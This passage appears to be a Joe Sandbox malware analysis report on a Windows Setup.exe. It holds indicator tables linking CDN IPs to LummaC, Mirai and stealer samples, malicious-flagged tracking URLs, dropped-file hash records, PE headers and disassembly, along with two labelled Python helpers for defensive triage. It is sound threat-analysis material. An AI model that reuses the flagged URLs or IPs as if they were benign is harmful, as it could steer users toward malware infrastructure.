                                                                                                                                                        https://confortdelaine.net/_t/c/A1020005-17FCBF5826D778A0-C9FF7535?l=AACrcmbDni/ExL+6O84qnOq7s+7FEV7f2cEnFZCBGkVuVLwxJJ9kIF+/XsJvnT/ZZCSNu0ZPkHJMldgNU5hySzD4vbkLFmicZpeb27RRNiBBqzluO2njDgWrhNVOuuG5KecX01qr4Wu4+GPJbk1wcH4NmoDfnECMgEyVdYVJNd9SJ/Z6oeOmLYfmhHtJEcZB1zTo2XcCZUK4o1X55Z6mDqHfXia9/zchVngkbUJFubdOeeGrUXmliV4kA4X0r42Yjp3RKfpMvJU0dvSKL9oGxXQi9sD/MbbP4pxgNW6CajbdZVfsCIontUHWT1eFW4HrQm9NkGaKTegqBxEs/bh3fwfINtkSa08UEhuWP97GhgCO8AMh0qPvYF1Rp7eiHGFkb8QogMMfuDrW2QnTqHRWnTzitTqkjecFMC67nh1FVX/+SWo05+3MmWfzaTxkwp1iAJoDUcmTFcR0WSTfeepWakTIU1exnjYHjHsm9FYU&c=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 hashmaliciousUnknownBrowse
                                                                                                                                                        • 23.227.38.65
                                                                                                                                                        https://confortdelaine.net/_t/c/A1020005-17FC1B6DB5BD9241-7C90090F?l=AADy6+7GSFDtie9t8Cg/YUEnWHeQNpQUM5LtDe7UJMsLOceAyoyG1gPOseIEt6wEQOIS0cQG9+43HQOpwin+IcDGpXOmivIAoIj+kjiIGL1D2+8BvnDBEaMAH0f591eHch8eVhYXQMKLzHwgDODg3wt5JqhlbP9RQzflWbxkgz8rcLW9fZi6fO8I2q/H/mufxAmprX0pckYJIlZDOjEWtANKm9qQyuOPBTmTxFfQ7lSnZTWTopfzM4iUzlHH6YHH2Gwf9rOJKxuawJshVk1D6tC4SPWT4Qn+EH36v6noVRG1OVZuyh8POMokxISZrUYw04m/WI9EIj5YnXnJ0pu3aN84TxZoMpQWLf/bmERiIc3Nyv1tTCdvcY5yUV048SjizDEvcSo7xAYIkZcbJD4FxApNB4P7tHx7BM4Ye85I4pWktamhPb27vCl/+uYQPRubCgSnJCgEpm957xU4Pe9/Mw441Bx0a9Cw1g==&c=AAAMLqZiPcHPCafs0rFGm1fIkoNaTXck7ODBjyaeBBJn4WJkh+1bSUuW3EZ3mxfwfU+bqGXZerIBh+MSgUxyjr2dBgbCYcsfxsvjUb8rm3+6Y+MBXQzywIZk3yyBwMGrGcyqAW4sC8CEsQLo0qa26hZf6P5Mds0gAcBhLOQHNHGs04Bz8kP6rN3oyHvKAVKj6q6jh+o5tCfFCSfoFphn1jIlhz58l/iThGupLjhturtvKm1NOX3hQvVyGuodJdqpVFaaDIitHXcYMqB9UmB9x5Je567LlrJzANu3yeDnFlF+FPlEJBxfqHj5MAKq9a5hjcUMFWRj2C1f6q3FTviqfxGBcXqL6mjrfRn2e6SZ3cLMdbrvJF8+K9bEjK0z+DPrn/wowMPNg/sWBhdBb591VOmiiOgz82MQYX1oZvuxWVx8Ss8Y39FUpF/cGTcZLojkZK6/ZSGPHVUwgwezuarqDmRh2tnVahKh1zxiH7oFrg0dqApoWgloHFVuYES+Zx6Fwu8ffg2y+FHXsyJlLjARsT0dR3inuufunKnxFU0f0p8osK+QnybUWCcqfkqTetWNzB5Z8asqQvYhVbUlxqje0VAbhML1S+q4B7u3yifa6/t82x0LbRE1kHeNSO2USFPZmw2CUqF5Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 23.227.38.65
                                                                                                                                                        https://confortdelaine.net/_t/c/A1020005-17FC1B6DB5BD9241-7C90090F?l=AACK/veH9NDjNFiJHV0SalQi1vBoTxR3+CaR+Tf08xqCc5VCUGXc4X3qdIj9jWGkdCLuES/KY7ELen4EAn/FdnHqCQjbGr4W7dR4kVnBVs6emUveso+FtMlz8WLaK/uswzzWIgI+d66EsmSIAjCn6klItun/LyfhMBm/RvF8+GmEHKuHrtJ8flo99oIsJ0uYTUcGFmrLFZUm12SmxPleHrWwUcLBo1d4hUAo1H1WkirRXbLvtA5AFdQBsGObYvK4Jtgjqj5gw5MW75B9OQ54AcZkBQKcIkmFcg1YL0qDKrf81oJq2UUhMNPl/V/7Lmh2Iy3+rO2Qx71WjGONpPizWLvD7lune8iRYENSNu1xGJst2AqunbtEprrHIRzSb0HY+HbbjV8np3yVIxGt0yN7Vmb5AARDME7dIwHUrmOBP8igeJjkCyNogIrPeE8U4hVHOONDQ0fRseICVU1/ok2ExphS1u92stTGUjMCSci5vEz5fgxKUh8PMHHlxtZQmBjhUQ==&c=AABwK74RGNbpZkLbXDMgwGkEPcjIolhPI3ARymI3akMXqIIsvKkft1xo30+FsOmyglvzbe8Yz6H3Z4LxZ/0aTZFTqxR6u54legvtFlkuV/Y5fZXwm/YmPanR9jUnqtc4hPznzAuUrT6U7sovDeUggzqrrdSH45Gj/uRY+/LazDIdhTbOxXQwN2GEeE643R7hV3n9WYZrcN1rJdKE4J3VridUK5YywIX20BWPmYGQ+iqSfiaJQlNujGzur2PRjzxDNGxHixYHr88wjhccRzzqt63TgH68hxiQWBS2WMJ8V78YgSedyDzugz0SWoHXC4lIoIg/mD4/gfyj8ItwLNrpe3LWbVMyaC3Ad4pEpAUwx2rMNAE2ZRJGw2pFtc10IGwr77FIEYyERoM+q4jxSJoFtK3knGK9ms7DQJFt8w0eTeON/BC9KGyQaC64dCNz+N4+Xs4aPX/XWl9TCa+jzc65pmbZE5Fi0IpF2S9gBcOFdJjQtmI1vA8o1jxGHT+6uixJoZsPaoFWVJAAyljwh/1U0kE7VmRRTmULBXD/WiUTWrHi0xFoOw6OPuSKQtWkN98CCafLvNNkYgEzgEh7ZP0U7YG2Ui/9zjmE3N9hxjTOSgO7rba70M6HBYbc4mR2U37DUGxUEU5CGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 23.227.38.65
AKAMAI-ASUS | Solara.exe | malicious | LummaC
  • 104.102.49.254
file.exe | malicious | LummaC
  • 104.102.49.254
file.exe | malicious | LummaC
  • 104.102.49.254
file.exe | malicious | LummaC
  • 104.102.49.254
PeleHfdpzX.elf | malicious | Mirai
  • 23.218.136.20
Loader.exe | malicious | LummaC
  • 104.102.49.254
file.exe | malicious | LummaC
  • 104.102.49.254
file.exe | malicious | LummaC
  • 104.102.49.254
file.exe | malicious | LummaC
  • 104.102.49.254
file.exe | malicious | LummaC
  • 104.102.49.254
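The context IPs above (172.67.x, 104.21.x, 104.26.x, 188.114.x) are shared Cloudflare edges and 104.102.49.254 is an Akamai edge, so an IP match against them says little beyond "another sample also used a CDN-fronted host"; the durable indicator is the domain or TLS SNI behind the edge. The Python below, an added example that is not part of this Joe Sandbox report, sorts the rows from the ASN context table into shared-edge and host-attributable indicators. It assumes Cloudflare's published IPv4 prefix list (cloudflare.com/ips-v4) as copied at the time of writing; Akamai is recognised only through the ASN label the report itself prints, and the last row (203.0.113.7, an "EXAMPLE-ASN") is constructed to show the non-CDN path.

```python
"""Separate CDN-fronted context IPs from host-attributable ones.

Added example for this report; it is not Joe Sandbox code. CONTEXT_ROWS is
copied from the ASN context table above plus one constructed non-CDN row.
"""
import ipaddress
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple

# Assumption: Cloudflare's published IPv4 edge prefixes (cloudflare.com/ips-v4)
# as of writing; refresh the list before relying on it operationally.
CLOUDFLARE_V4 = [
    "173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "141.101.64.0/18", "108.162.192.0/18", "190.93.240.0/20", "188.114.96.0/20",
    "197.234.240.0/22", "198.41.128.0/17", "162.158.0.0/15", "104.16.0.0/13",
    "104.24.0.0/14", "172.64.0.0/13", "131.0.72.0/22",
]
CDN_NETWORKS = {"Cloudflare": [ipaddress.ip_network(p) for p in CLOUDFLARE_V4]}

# (ASN label as printed by the report, sample, threat name, context IP).
# All but the last row come from the table above; the last row is constructed.
CONTEXT_ROWS: List[Tuple[str, str, str, str]] = [
    ("CLOUDFLARENETUS", "v.1.6.3__x64__.msi", "LegionLoader", "172.67.221.87"),
    ("CLOUDFLARENETUS", "phantomtoolsv2.exe", "CredGrabber, Meduza Stealer", "104.26.13.205"),
    ("CLOUDFLARENETUS", "FluxusV2.exe", "Python Stealer, CStealer", "104.26.3.16"),
    ("CLOUDFLARENETUS", "Solara.exe", "LummaC", "104.21.77.78"),
    ("CLOUDFLARENETUS", "file.exe", "LummaC", "172.67.206.204"),
    ("AKAMAI-ASUS", "Solara.exe", "LummaC", "104.102.49.254"),
    ("AKAMAI-ASUS", "Loader.exe", "LummaC", "104.102.49.254"),
    ("AKAMAI-ASUS", "PeleHfdpzX.elf", "Mirai", "23.218.136.20"),
    ("EXAMPLE-ASN", "constructed.exe", "Constructed", "203.0.113.7"),  # constructed
]


def cdn_owner(ip: str) -> Optional[str]:
    """Return the CDN whose published prefixes contain ip, else None."""
    addr = ipaddress.ip_address(ip)
    for name, nets in CDN_NETWORKS.items():
        if any(addr in net for net in nets):
            return name
    return None


def indicator_quality(ip: str, asn_label: str) -> str:
    """'shared-edge' when the IP is a CDN edge (by prefix, or by the report's
    own ASN label for CDNs whose ranges are not embedded here), else 'host'."""
    if cdn_owner(ip) is not None:
        return "shared-edge"
    # Assumption: the report's AKAMAI-* / CLOUDFLARENET* labels denote CDN edges.
    if asn_label.startswith(("AKAMAI", "CLOUDFLARENET")):
        return "shared-edge"
    return "host"


def group_by_threat(rows) -> Dict[str, Dict[str, Set[str]]]:
    """Map threat name -> {'shared-edge': {ips}, 'host': {ips}}."""
    out: Dict[str, Dict[str, Set[str]]] = defaultdict(
        lambda: {"shared-edge": set(), "host": set()})
    for asn_label, _sample, threat, ip in rows:
        out[threat][indicator_quality(ip, asn_label)].add(ip)
    return dict(out)


if __name__ == "__main__":
    for threat, buckets in group_by_threat(CONTEXT_ROWS).items():
        print(f"{threat}: shared-edge={sorted(buckets['shared-edge'])} "
              f"host={sorted(buckets['host'])}")
```

Every LummaC IP in the table lands in the shared-edge bucket, which is the practical reading of "IP address seen in connection with other malware" here: useful for pivoting in the sandbox, weak as a blocklist entry on its own.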
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | Solara.exe | malicious | LummaC | 188.114.97.3, 104.21.33.249, 172.67.173.224, 188.114.96.3, 104.102.49.254, 172.67.140.193, 104.21.77.78, 104.21.79.35, 172.67.206.204
 | file.exe | malicious | LummaC | 188.114.97.3, 104.21.33.249, 172.67.173.224, 188.114.96.3, 104.102.49.254, 172.67.140.193, 104.21.77.78, 104.21.79.35, 172.67.206.204
 | file.exe | malicious | LummaC | 188.114.97.3, 104.21.33.249, 172.67.173.224, 188.114.96.3, 104.102.49.254, 172.67.140.193, 104.21.77.78, 104.21.79.35, 172.67.206.204
 | file.exe | malicious | LummaC | 188.114.97.3, 104.21.33.249, 172.67.173.224, 188.114.96.3, 104.102.49.254, 172.67.140.193, 104.21.77.78, 104.21.79.35, 172.67.206.204
 | Loader.exe | malicious | LummaC | 188.114.97.3, 104.21.33.249, 172.67.173.224, 188.114.96.3, 104.102.49.254, 172.67.140.193, 104.21.77.78, 104.21.79.35, 172.67.206.204
 | file.exe | malicious | LummaC | 188.114.97.3, 104.21.33.249, 172.67.173.224, 188.114.96.3, 104.102.49.254, 172.67.140.193, 104.21.77.78, 104.21.79.35, 172.67.206.204
 | file.exe | malicious | LummaC | 188.114.97.3, 104.21.33.249, 172.67.173.224, 188.114.96.3, 104.102.49.254, 172.67.140.193, 104.21.77.78, 104.21.79.35, 172.67.206.204
 | file.exe | malicious | LummaC | 188.114.97.3, 104.21.33.249, 172.67.173.224, 188.114.96.3, 104.102.49.254, 172.67.140.193, 104.21.77.78, 104.21.79.35, 172.67.206.204
 | file.exe | malicious | LummaC | 188.114.97.3, 104.21.33.249, 172.67.173.224, 188.114.96.3, 104.102.49.254, 172.67.140.193, 104.21.77.78, 104.21.79.35, 172.67.206.204
 | file.exe | malicious | LummaC | 188.114.97.3, 104.21.33.249, 172.67.173.224, 188.114.96.3, 104.102.49.254, 172.67.140.193, 104.21.77.78, 104.21.79.35, 172.67.206.204
                                                                                                                                                        No context
Process: C:\Users\user\Desktop\Setup.exe
File Type: C++ source, ASCII text, with very long lines (324), with escape sequences
Category: dropped
Size (bytes): 138639
Entropy (8bit): 4.286369825068587
Encrypted: false
SSDEEP: 1536:ZMjsdRCCXpnzopj7/5dLopnQPporDa6meL4xmJ:fenLo9QP+lmeL4IJ
MD5: A7C8367F8B900617374F5D3FAC86DFD7
SHA1: 6BDEAB34FA632083B2578708EB0C50443ED5E9A9
SHA-256: E4F82DB7579D84B2DDB49B16A8CBD8256D86751473D1A86B4B31D1E3963BA0FA
SHA-512: 2C2E9D5445F4BDFBCA7F35881E9D133373145B40D26ECB9B122E60DD343B580FA3BC70C8B981B4AE7E3D9B8C4EA90C6A77F7328A60CBE0F2515EE364AD0CB0A3
Malicious: false
Reputation: moderate, very likely benign file
Preview: var __webpack_modules__ = {. 821: (module, __unused_webpack_exports, __webpack_require__) => {. "use strict";. module = __webpack_require__.nmd(module);. const wrapAnsi16 = (fn, offset) => (...args) => {. const code = fn(...args);. return `.[${code + offset}m`;. };. const wrapAnsi256 = (fn, offset) => (...args) => {. const code = fn(...args);. return `.[${38 + offset};5;${code}m`;. };. const wrapAnsi16m = (fn, offset) => (...args) => {. const rgb = fn(...args);. return `.[${38 + offset};2;${rgb[0]};${rgb[1]};${rgb[2]}m`;. };. const ansi2ansi = n => n;. const rgb2rgb = (r, g, b) => [ r, g, b ];. const setLazyProperty = (object, property, get) => {. Object.defineProperty(object, property, {. get: () => {. const value = get();. Object.defineProperty(object, property, {.
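The record above lists the fields an analyst will want to recompute when verifying a dropped file independently of the sandbox: size, the four digests, and an 8-bit entropy that drives the Encrypted flag (the preview shows a plain-text webpack JavaScript bundle, which is why the entropy sits near 4.3 bits per byte despite the "C++ source" file-type guess). The Python below is an added example, not Joe Sandbox code. It assumes that "Entropy (8bit)" means Shannon entropy in bits per byte over the whole file and uses an entropy cutoff of its own choosing for the encrypted/packed flag, since the report does not state the sandbox's threshold; the sample bytes are constructed from the first lines of the preview, not the real 138639-byte file.

```python
"""Recompute size, entropy, encrypted flag and digests for a dropped file.

Added example; not Joe Sandbox code. Assumptions: "Entropy (8bit)" is Shannon
entropy in bits per byte; ENCRYPTED_THRESHOLD is chosen here, not documented
by the sandbox; SAMPLE_JS is a constructed stand-in built from the Preview.
"""
import hashlib
import math
from collections import Counter
from typing import Dict

# Constructed stand-in: the first lines of the dropped webpack bundle's preview.
SAMPLE_JS = (
    b'var __webpack_modules__ = {\n 821: (module, __unused_webpack_exports, '
    b'__webpack_require__) => {\n "use strict";\n'
    b' module = __webpack_require__.nmd(module);\n'
    b' const wrapAnsi16 = (fn, offset) => (...args) => {\n'
)

# Assumption: a common cutoff above which a blob is treated as compressed,
# encrypted or packed; uniform random bytes score 8.0, ASCII text roughly 4-5.
ENCRYPTED_THRESHOLD = 7.2


def entropy_bits_per_byte(data: bytes) -> float:
    """Shannon entropy H = -sum p(b) * log2 p(b) over byte values, in 0.0..8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def digests(data: bytes) -> Dict[str, str]:
    """Uppercase hex digests, keyed and ordered the way the report prints them."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def describe(data: bytes) -> Dict[str, object]:
    """Build the same fields as one dropped-file record from raw bytes."""
    h = entropy_bits_per_byte(data)
    record: Dict[str, object] = {
        "Size (bytes)": len(data),
        "Entropy (8bit)": h,
        "Encrypted": h >= ENCRYPTED_THRESHOLD,
    }
    record.update(digests(data))
    return record


if __name__ == "__main__":
    for key, value in describe(SAMPLE_JS).items():
        print(f"{key}: {value}")
```

Run the same `describe` over the actual dropped file to confirm the MD5/SHA values the report prints; a mismatch means you are not looking at the same artifact the sandbox saw (different build, re-downloaded payload, or post-processing by your collection tooling).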
                                                                                                                                                        Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                        File Type:JSON data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):218125
                                                                                                                                                        Entropy (8bit):5.457704584855637
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:zKHyW445CPl85X3GJXlAnFhvMvOqGPUqdShdY5S8DoDT1JyBwJbMaky9nwe+L/Iq:LWY4KTvqd8dYQ8uJcwSy9nQ
                                                                                                                                                        MD5:0FEFBA04D8BBEDD2CFF7EB75C3834847
                                                                                                                                                        SHA1:054D11200D77C1B5DFB3B98A33973623619D34BE
                                                                                                                                                        SHA-256:DBBDB23093B0732EE1504F79D3835B1C6B2E3F526AB42A6DA381E6CEC2648AE5
                                                                                                                                                        SHA-512:3CEAA01275E2DEC044BA5F8D41092EB4F28E62CDAD24A71C8F7F57E4C48B709568C8C376BF2B048DC989810FB8EB91F2D944379804D5D85480A26663FC3F90FE
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                        Preview:{"version":3,"file":"bin/jsii-runtime.js","mappings":";;;;QAEA,MAAMA,aAAa,CAACC,IAAIC,WAAW,IAAIC;YACtC,MAAMC,OAAOH,MAAME;YACnB,OAAO,KAAUC,OAAOF;AAAS;QAGlC,MAAMG,cAAc,CAACJ,IAAIC,WAAW,IAAIC;YACvC,MAAMC,OAAOH,MAAME;YACnB,OAAO,KAAU,KAAKD,YAAYE;AAAO;QAG1C,MAAME,cAAc,CAACL,IAAIC,WAAW,IAAIC;YACvC,MAAMI,MAAMN,MAAME;YAClB,OAAO,KAAU,KAAKD,YAAYK,IAAI,MAAMA,IAAI,MAAMA,IAAI;AAAK;QAGhE,MAAMC,YAAYC,KAAKA;QACvB,MAAMC,UAAU,CAACC,GAAGC,GAAGC,MAAM,EAACF,GAAGC,GAAGC;QAEpC,MAAMC,kBAAkB,CAACC,QAAQC,UAAUC;YAC1CC,OAAOC,eAAeJ,QAAQC,UAAU;gBACvCC,KAAK;oBACJ,MAAMG,QAAQH;oBAEdC,OAAOC,eAAeJ,QAAQC,UAAU;wBACvCI;wBACAC,YAAY;wBACZC,cAAc;;oBAGf,OAAOF;AAAK;gBAEbC,YAAY;gBACZC,cAAc;;AACb;QAIH,IAAIC;QACJ,MAAMC,oBAAoB,CAACC,MAAMC,aAAaC,UAAUC;YACvD,IAAIL,iBAAiBM,WAAW;gBAC/BN,eAAe,oBAAQ;AACxB;YAEA,MAAMrB,SAAS0B,eAAe,KAAK;YACnC,MAAME,SAAS,CAAC;YAEhB,KAAK,OAAOC,aAAaC,UAAUd,OAAOe,QAAQV,eAAe;gBAChE,MAAMW,OAAOH,gBAAgB,WAAW,SAASA;gBACjD,IAAIA,gBAAgBL,aAAa;oBAChCI,OAAOI,QAAQT,KAAKE,UAAUzB;AAC/B,uBAAO,WAAW8B,UAAU,UAAU;oBACrCF,OAAOI,Q
                                                                                                                                                        Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                        File Type:ASCII text, with very long lines (489)
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):802466
                                                                                                                                                        Entropy (8bit):4.298722687837962
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:Z6TjefxOXTNwk8mCkCbCp4wrZaWvZEIhU4FFEY+cbCtNYbIgoxrV2z1J:Z6TjefxOXTNUkCbCp42aW4NwL
                                                                                                                                                        MD5:4C6E1287B2F6060C1E0F386B0B47959A
                                                                                                                                                        SHA1:0FA0C721B6848D78C73FCF74BB37891A17FF0999
                                                                                                                                                        SHA-256:C8DB5A41C7EC02EB2F1F20A6CD544DB215246AD9D566EA9494D63521B9B1E271
                                                                                                                                                        SHA-512:0FF6A037A413BE93DCB3C1B4C26CB9938025F34D9AA20818FBDED5B4B00BC89DCBA9EB58756BAFBA852CA972C058BDDB087E9CB58C9B442AC936C93590E14C13
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:var __webpack_modules__ = {. 1165: (module, __unused_webpack_exports, __webpack_require__) => {. "use strict";. const fs = __webpack_require__(9896);. const path = __webpack_require__(6928);. const LCHOWN = fs.lchown ? "lchown" : "chown";. const LCHOWNSYNC = fs.lchownSync ? "lchownSync" : "chownSync";. const needEISDIRHandled = fs.lchown && !process.version.match(/v1[1-9]+\./) && !process.version.match(/v10\.[6-9]/);. const lchownSync = (path, uid, gid) => {. try {. return fs[LCHOWNSYNC](path, uid, gid);. } catch (er) {. if (er.code !== "ENOENT") throw er;. }. };. const chownSync = (path, uid, gid) => {. try {. return fs.chownSync(path, uid, gid);. } catch (er) {. if (er.code !== "ENOENT") throw er;. }. };. const handleEISDIR = needEISDIRHandled ? (path, uid, gid, cb) => er => {.
                                                                                                                                                        Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1155588
                                                                                                                                                        Entropy (8bit):5.4159552687244155
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:D2DUMiOfGYFO/1pf0ThVUhI2PoEMuCfzT/2ZoEC74RiCfulDlJ:MZFO/1pf9hI2EjT/2ZoEC74RiCfulDlJ
                                                                                                                                                        MD5:BE06DF1EE810220598CAE6D42AE2FD77
                                                                                                                                                        SHA1:5DD0B0F101FDE69B49E37947380431D75D26125C
                                                                                                                                                        SHA-256:09E18C6FA27068005DA8BCBB802C70B1C182866274478C684A4AB652ACAF2BBD
                                                                                                                                                        SHA-512:BF40F52E37DFDBEE4AC4F562A28520893D3C8C13FDDB7A94E94458B1E8591162EADF3A4BE401A2FF6C2CE2449721F3F036C2B41571BB3C491E7F648595BAA8FA
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:{"version":3,"file":"lib/program.js","mappings":";;;QACA,MAAMA,KAAK,oBAAQ;QACnB,MAAMC,OAAO,oBAAQ;QAGrB,MAAMC,SAASF,GAAGG,SAAS,WAAW;QAEtC,MAAMC,aAAaJ,GAAGK,aAAa,eAAe;QAGlD,MAAMC,oBAAoBN,GAAGG,WAC1BI,QAAQC,QAAQC,MAAM,kBACtBF,QAAQC,QAAQC,MAAM;QAEzB,MAAMJ,aAAa,CAACJ,MAAMS,KAAKC;YAC7B;gBACE,OAAOX,GAAGI,YAAYH,MAAMS,KAAKC;AACnC,cAAE,OAAOC;gBACP,IAAIA,GAAGC,SAAS,UACd,MAAMD;AACV;AAAA;QAIF,MAAME,YAAY,CAACb,MAAMS,KAAKC;YAC5B;gBACE,OAAOX,GAAGc,UAAUb,MAAMS,KAAKC;AACjC,cAAE,OAAOC;gBACP,IAAIA,GAAGC,SAAS,UACd,MAAMD;AACV;AAAA;QAIF,MAAMG,eACJT,oBAAoB,CAACL,MAAMS,KAAKC,KAAKK,OAAOJ;YAI1C,KAAKA,MAAMA,GAAGC,SAAS,UACrBG,GAAGJ,UAEHZ,GAAGiB,MAAMhB,MAAMS,KAAKC,KAAKK;AAAE,YAE7B,CAACE,GAAGC,IAAIC,KAAKJ,OAAOA;QAGxB,MAAMK,mBACJf,oBAAoB,CAACL,MAAMS,KAAKC;YAC9B;gBACE,OAAON,WAAWJ,MAAMS,KAAKC;AAC/B,cAAE,OAAOC;gBACP,IAAIA,GAAGC,SAAS,UACd,MAAMD;gBACRE,UAAUb,MAAMS,KAAKC;AACvB;AAAA,YAEA,CAACV,MAAMS,KAAKC,QAAQN,WAAWJ,MAAMS,KAAKC;QAG9C,MAAMW,cAAcf,QAAQC;QAC5B,IAAIe,UAAU,CAACtB,MAAMuB,SAASR,OAAOhB,GAAGuB,QAAQtB,MAAMuB,SAASR;Q
                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Entropy (8bit):6.454874535899765
                                                                                                                                                        TrID:
                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                        File name:Setup.exe
                                                                                                                                                        File size:25'899'008 bytes
                                                                                                                                                        MD5:05443b11c90686db9e945c7b5db2083f
                                                                                                                                                        SHA1:4d06a81a31d2a24acf23aebc669e36ab43198c83
                                                                                                                                                        SHA256:941bc1cae6bd0f033e560e2312324653586dbe7d84bb231e89c479501ab3419d
                                                                                                                                                        SHA512:693832070f162df0fbd7fdb336f19d897613bfac599dabbd38c6fa141f9e455f63e6d2670fdb787706aed0fef5c015b9f4f5932951d840e3fcb506990806cdec
                                                                                                                                                        SSDEEP:196608:e0z/qPprQ/hcQJBwus9CPTKtvWuLC8Yt:vexGJBwus9CPTiFxYt
                                                                                                                                                        TLSH:0A471910FA4792F1DE07483105EF617F22346D059F2989CFF64E7A18E737AA60AB7609
                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B....................................y...@.......................... .......X....@................................
                                                                                                                                                        Icon Hash:6d6933652b33694d
                                                                                                                                                        Entrypoint:0x479690
                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                        Digitally signed:false
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                        TLS Callbacks:
                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                        OS Version Major:6
                                                                                                                                                        OS Version Minor:1
                                                                                                                                                        File Version Major:6
                                                                                                                                                        File Version Minor:1
                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                        Import Hash:1aae8bf580c846f39c71c05898e57e88
                                                                                                                                                        Instruction
                                                                                                                                                        jmp 00007FB510DC2CA0h
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        sub esp, 28h
                                                                                                                                                        mov dword ptr [esp+1Ch], ebx
                                                                                                                                                        mov dword ptr [esp+10h], ebp
                                                                                                                                                        mov dword ptr [esp+14h], esi
                                                                                                                                                        mov dword ptr [esp+18h], edi
                                                                                                                                                        mov dword ptr [esp], eax
                                                                                                                                                        mov dword ptr [esp+04h], ecx
                                                                                                                                                        call 00007FB510D9DC06h
                                                                                                                                                        mov eax, dword ptr [esp+08h]
                                                                                                                                                        mov edi, dword ptr [esp+18h]
                                                                                                                                                        mov esi, dword ptr [esp+14h]
                                                                                                                                                        mov ebp, dword ptr [esp+10h]
                                                                                                                                                        mov ebx, dword ptr [esp+1Ch]
                                                                                                                                                        add esp, 28h
                                                                                                                                                        retn 0004h
                                                                                                                                                        ret
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        sub esp, 08h
                                                                                                                                                        mov ecx, dword ptr [esp+0Ch]
                                                                                                                                                        mov edx, dword ptr [ecx]
                                                                                                                                                        mov eax, esp
                                                                                                                                                        mov dword ptr [edx+04h], eax
                                                                                                                                                        sub eax, 00010000h
                                                                                                                                                        mov dword ptr [edx], eax
                                                                                                                                                        add eax, 00000BA0h
                                                                                                                                                        mov dword ptr [edx+08h], eax
                                                                                                                                                        mov dword ptr [edx+0Ch], eax
                                                                                                                                                        lea edi, dword ptr [ecx+34h]
                                                                                                                                                        mov dword ptr [edx+18h], ecx
                                                                                                                                                        mov dword ptr [edi], edx
                                                                                                                                                        mov dword ptr [esp+04h], edi
                                                                                                                                                        call 00007FB510DC50F4h
                                                                                                                                                        cld
                                                                                                                                                        call 00007FB510DC418Eh
                                                                                                                                                        call 00007FB510DC2DC9h
                                                                                                                                                        add esp, 08h
                                                                                                                                                        ret
                                                                                                                                                        jmp 00007FB510DC4FA0h
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        mov ebx, dword ptr [esp+04h]
                                                                                                                                                        mov ebp, esp
                                                                                                                                                        mov dword ptr fs:[00000034h], 00000000h
                                                                                                                                                        mov ecx, dword ptr [ebx+04h]
                                                                                                                                                        cmp ecx, 00000000h
                                                                                                                                                        je 00007FB510DC4FA1h
                                                                                                                                                        mov eax, ecx
                                                                                                                                                        shl eax, 02h
                                                                                                                                                        sub esp, eax
                                                                                                                                                        mov edi, esp
                                                                                                                                                        mov esi, dword ptr [ebx+08h]
                                                                                                                                                        cld
                                                                                                                                                        rep movsd
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1820000 | 0x44c | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x18c3000 | 0x1ebc4 | .rsrc
